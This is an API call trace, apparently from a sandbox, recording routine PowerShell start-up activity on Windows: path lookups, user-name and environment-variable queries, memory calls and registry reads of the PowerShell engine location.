	[0808.973] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece10 | out: lpFileInformation=0x1ece10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.973] SetErrorMode (uMode=0x1) returned 0x1
	[0808.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.973] SetErrorMode (uMode=0x1) returned 0x1
	[0808.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece10 | out: lpFileInformation=0x1ece10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.974] SetErrorMode (uMode=0x1) returned 0x1
	[0808.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ece70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0808.976] SetErrorMode (uMode=0x1) returned 0x1
	[0808.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ed0d0 | out: lpFileInformation=0x1ed0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0808.977] SetErrorMode (uMode=0x1) returned 0x1
	[0808.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0808.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0808.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0808.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0809.853] CoTaskMemAlloc (cb=0x804) returned 0x1b8b9550
	[0809.853] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b9550, nSize=0x1ed438 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed438) returned 0x1
	[0809.854] CoTaskMemFree (pv=0x1b8b9550) 
	[0809.854] CoTaskMemAlloc (cb=0x204) returned 0x403ff0
	[0809.854] GetUserNameW (in: lpBuffer=0x403ff0, pcbBuffer=0x1ed478 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed478) returned 1
	[0809.854] CoTaskMemFree (pv=0x403ff0) 
	[0809.856] ReportEventW (hEventLog=0x1b980008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x310a128*="Available", lpRawData=0x3109eb8) returned 1
	[0810.495] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0810.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.496] CoTaskMemFree (pv=0x41ebe0) 
	[0810.497] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0810.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.497] CoTaskMemFree (pv=0x41ebe0) 
	[0810.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.504] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0810.505] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0810.505] CoTaskMemFree (pv=0x41ebe0) 
	[0810.505] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0810.505] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0810.505] CoTaskMemFree (pv=0x41ebe0) 
	[0810.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.507] GetCurrentProcessId () returned 0xbb8
	[0810.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0810.512] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed458 | out: phkResult=0x1ed458*=0x388) returned 0x0
	[0810.512] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed3dc, lpData=0x0, lpcbData=0x1ed3d8*=0x0 | out: lpType=0x1ed3dc*=0x1, lpData=0x0, lpcbData=0x1ed3d8*=0x56) returned 0x0
	[0810.512] CoTaskMemAlloc (cb=0x5a) returned 0x3f0510
	[0810.512] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed3ac, lpData=0x3f0510, lpcbData=0x1ed3a8*=0x56 | out: lpType=0x1ed3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed3a8*=0x56) returned 0x0
	[0810.512] CoTaskMemFree (pv=0x3f0510) 
	[0810.512] RegCloseKey (hKey=0x388) returned 0x0
	[0810.514] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0810.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.515] CoTaskMemFree (pv=0x41ebe0) 
	[0811.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.605] VirtualQuery (in: lpAddress=0x1eb4b0, lpBuffer=0x1ec370, dwLength=0x30 | out: lpBuffer=0x1ec370*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0811.611] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0811.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0811.611] CoTaskMemFree (pv=0x41ebe0) 
	[0813.012] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0813.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.012] CoTaskMemFree (pv=0x41ebe0) 
	[0813.013] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0813.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.013] CoTaskMemFree (pv=0x41ebe0) 
	[0813.014] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0813.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.014] CoTaskMemFree (pv=0x41ebe0) 
	[0813.017] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0813.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.017] CoTaskMemFree (pv=0x41ebe0) 
	[0813.024] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0813.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.024] CoTaskMemFree (pv=0x41ebe0) 
	[0813.026] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0813.026] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0813.026] CoTaskMemFree (pv=0x41ebe0) 
	[0813.032] VirtualQuery (in: lpAddress=0x1eb4b0, lpBuffer=0x1ec370, dwLength=0x30 | out: lpBuffer=0x1ec370*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0815.667] VirtualQuery (in: lpAddress=0x1eb4b0, lpBuffer=0x1ec370, dwLength=0x30 | out: lpBuffer=0x1ec370*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0815.676] CoTaskMemAlloc (cb=0x104) returned 0x41ebe0
	[0815.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ebe0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.676] CoTaskMemFree (pv=0x41ebe0) 
	[0819.713] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x41f020
	[0819.715] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x41f130
	[0835.662] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0835.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0835.662] CoTaskMemFree (pv=0x41f240) 
	[0835.681] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0835.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0835.681] CoTaskMemFree (pv=0x41f240) 
	[0837.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0837.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0837.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0837.779] VirtualQuery (in: lpAddress=0x1eb760, lpBuffer=0x1ec620, dwLength=0x30 | out: lpBuffer=0x1ec620*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0837.786] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed5b8 | out: phkResult=0x1ed5b8*=0x38c) returned 0x0
	[0837.786] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed53c, lpData=0x0, lpcbData=0x1ed538*=0x0 | out: lpType=0x1ed53c*=0x1, lpData=0x0, lpcbData=0x1ed538*=0x56) returned 0x0
	[0837.787] CoTaskMemAlloc (cb=0x5a) returned 0x47ec90
	[0837.787] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed50c, lpData=0x47ec90, lpcbData=0x1ed508*=0x56 | out: lpType=0x1ed50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed508*=0x56) returned 0x0
	[0837.787] CoTaskMemFree (pv=0x47ec90) 
	[0837.787] RegCloseKey (hKey=0x38c) returned 0x0
